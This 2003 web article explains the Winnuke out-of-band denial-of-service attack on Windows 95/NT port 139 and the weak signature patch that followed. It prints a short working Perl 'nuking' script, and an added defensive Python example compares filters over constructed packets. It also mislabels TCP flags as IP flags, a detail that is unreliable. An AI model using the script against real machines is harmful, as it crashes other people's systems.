Winnuke the technical side
# Networking    Aug 09 2003 - 06:33 EST    Posted By numberXIII

A technical explanation of the OOB (out-of-band) packet vulnerability behind the Winnuke program.

Winnuke is a DoS attack that sends OOB (Out Of Band) packets to a Windows box. The attack consists of sending OOB packets to the NetBIOS port (139) of that machine. The operating system, not expecting that type of data, crashes or freezes, usually resulting in the "Blue Screen Of Death" (BSOD). The main vulnerable systems are Windows 95 and Windows NT. A program, called Winnuke, was written to do all of that.


IP packets are used to send information on the internet. They contain specific information about the sender, the receiver and the port to send the packet to. IP packets contain flags which give information on how the packets must be handled while passing through routers or other systems. Each flag is a single bit with 2 states: on (set to 1) or off (set to 0). These flags include the following:

- SYN (synchronisation): establishes a new session
- ACK (acknowledgment): acknowledges the correct reception of a packet
- URGENT: indicates that a packet contains important information, like out-of-band data (OOB packets), which are the packets used for this exploit

Now, to exploit the vulnerability, all an attacker has to do is send out-of-band data to port 139 with a simple Perl script. Must I remind you all that this script is only for learning purposes and I won't take any responsibility for what you do with it. Nevertheless, here is a simple "nuking" Perl script:

#!/usr/bin/perl
use IO::Socket;
IO::Socket::INET
->new(PeerAddr=>"some_vulnerable_host.com:139")
->send("nuke with this message", MSG_OOB);


A (short-term) solution was found by Microsoft and added to a patch for Windows NT. The only bad thing about this patch was its scope: it only blocked nukes from the original winnuke program. What the patch did was filter the packets going through port 139 that contained the message "nuke me" (the message sent out of band in the first version of the program). So when the patch was released, a new version of winnuke was released as well, a version where the attacker could choose the text to nuke with!
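The two passages above (the flag explanation and the description of the NT patch) can be tied together with a small defender-side example. The following Python block is an added example written for this page; it is not the article's code and is not related to the original Perl script or to Microsoft's actual patch. It decodes a raw TCP segment (the URG flag and urgent pointer live in the TCP header, per RFC 793), then compares two hypothetical filters over constructed sample traffic: a payload-signature filter that mimics the "nuke me" string match the article describes, and a flag-based filter that drops any segment to port 139 carrying the URG flag. The function names, the sample port numbers and the sample packets are all assumptions constructed for this example; nothing is sent on the wire.

```python
import struct

# TCP flag bits in the low byte of the 16-bit data-offset/flags field (RFC 793).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
NETBIOS_SESSION_PORT = 139  # the port the article says Winnuke targets

# The string the article says the original tool sent and the NT patch matched on.
ORIGINAL_NUKE_TEXT = b"nuke me"


def parse_tcp_segment(segment):
    """Decode a raw TCP segment (header + payload) into a dict.

    Hypothetical helper for this example: reads the fixed 20-byte header,
    skips any options via the data offset, and returns ports, flag bits,
    urgent pointer and payload.
    """
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    (src_port, dst_port, _seq, _ack, off_flags,
     _window, _checksum, urg_ptr) = struct.unpack("!HHIIHHHH", segment[:20])
    data_offset = (off_flags >> 12) * 4
    if data_offset < 20 or data_offset > len(segment):
        raise ValueError("bad TCP data offset")
    return {
        "src_port": src_port,
        "dst_port": dst_port,
        "flags": off_flags & 0x1FF,  # nine flag bits: NS CWR ECE URG ACK PSH RST SYN FIN
        "urg_ptr": urg_ptr,
        "payload": segment[data_offset:],
    }


def build_tcp_segment(src_port, dst_port, flags, payload, urg_ptr=0):
    """Build a constructed TCP segment with a 20-byte header and no options.

    Only used to create in-memory test data for the filters below; the
    checksum is left as zero and nothing is ever put on the wire.
    """
    off_flags = (5 << 12) | (flags & 0x1FF)  # data offset 5 words = 20 bytes
    header = struct.pack("!HHIIHHHH", src_port, dst_port, 1, 1,
                         off_flags, 8192, 0, urg_ptr)
    return header + payload


def signature_filter(seg):
    """Mimics the narrow patch the article describes: a segment to port 139 is
    dropped only if its payload contains the original tool's text."""
    return seg["dst_port"] == NETBIOS_SESSION_PORT and ORIGINAL_NUKE_TEXT in seg["payload"]


def urgent_flag_filter(seg):
    """Behaviour-based check: any segment to port 139 with the URG flag set,
    i.e. carrying out-of-band data, whatever the payload says."""
    return seg["dst_port"] == NETBIOS_SESSION_PORT and bool(seg["flags"] & URG)


def evaluate_filters(segments):
    """Run both filters over (label, raw_segment) pairs and return, per
    segment, a (label, caught_by_signature, caught_by_urg_flag) tuple."""
    results = []
    for label, raw in segments:
        seg = parse_tcp_segment(raw)
        results.append((label, signature_filter(seg), urgent_flag_filter(seg)))
    return results


# Constructed sample traffic for the example, not captured packets.
SAMPLE_SEGMENTS = [
    ("original winnuke text, URG set",
     build_tcp_segment(40000, 139, PSH | ACK | URG, ORIGINAL_NUKE_TEXT,
                       urg_ptr=len(ORIGINAL_NUKE_TEXT))),
    ("user-chosen text, URG set",
     build_tcp_segment(40001, 139, PSH | ACK | URG, b"anything else", urg_ptr=13)),
    ("ordinary NetBIOS session request, no URG",
     build_tcp_segment(40002, 139, PSH | ACK, b"\x81\x00\x00\x44")),
    ("URG to a different port",
     build_tcp_segment(40003, 80, PSH | ACK | URG, ORIGINAL_NUKE_TEXT, urg_ptr=7)),
]

if __name__ == "__main__":
    for label, by_sig, by_urg in evaluate_filters(SAMPLE_SEGMENTS):
        print(f"{label:42s} signature={by_sig!s:5s} urg_flag={by_urg!s}")
```

Running the block shows the point of the second-version winnuke: the signature filter catches only the first sample, while the flag-based filter catches both URG-bearing segments to port 139 and leaves the ordinary session request alone. Matching on what a tool happens to send is a signature for one tool; matching on the protocol feature the target mishandles covers every variant of it.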

XIII
numberXIII@Phreaker.net




To the best of our knowledge, the text on this page either may be freely reproduced and distributed or was written specifically for fromadia.com. The site layout, page layout, and all original artwork on this site are Copyright © 2002 Fromadia.com. If you wish to reproduce any of it or if you are author of a work that you feel shouldn't be printed here, please email us at copyright@fromadia.com.
